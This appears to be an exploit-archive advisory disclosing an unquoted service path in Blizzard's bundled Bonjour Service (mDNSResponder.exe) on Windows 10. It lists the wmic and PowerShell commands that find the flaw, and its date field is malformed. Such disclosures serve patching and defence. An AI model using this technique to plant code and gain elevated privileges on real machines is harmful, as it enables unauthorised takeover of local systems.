c27f5a1741
2 changes to exploits/shellcodes/ghdb Bonjour Service 'mDNSResponder.exe' - Unquoted Service Path Privilege Escalation
34 lines
No EOL
1.1 KiB
Text
34 lines
No EOL
1.1 KiB
Text
# Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service
|
|
Path
|
|
# Discovery by: bios
|
|
# Discovery Date: 2024-15-07
|
|
# Vendor Homepage: https://developer.apple.com/bonjour/
|
|
# Tested Version: 3,0,0,10
|
|
# Vulnerability Type: Unquoted Service Path
|
|
# Tested on OS: Microsoft Windows 10 Home
|
|
|
|
# Step to discover Unquoted Service Path:
|
|
|
|
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|
|
|findstr /i /v "c:\windows\\" |findstr /i /v """
|
|
Bonjour Service
|
|
Bonjour Service
|
|
C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe
|
|
Auto
|
|
|
|
C:\>systeminfo
|
|
|
|
Host Name: DESKTOP-HFBJOBG
|
|
OS Name: Microsoft Windows 10 Home
|
|
OS Version: 10.0.19045 N/A Build 19045
|
|
|
|
PS C:\Program Files\Blizzard\Bonjour Service> powershell -command
|
|
"(Get-Command .\mDNSResponder.exe).FileVersionInfo.FileVersion"
|
|
>>
|
|
3,0,0,10
|
|
|
|
#Exploit:
|
|
|
|
There is an Unquoted Service Path in Bonjour Services (mDNSResponder.exe) .
|
|
This may allow an authorized local user to insert arbitrary code into the
|
|
unquoted service path and escalate privileges. |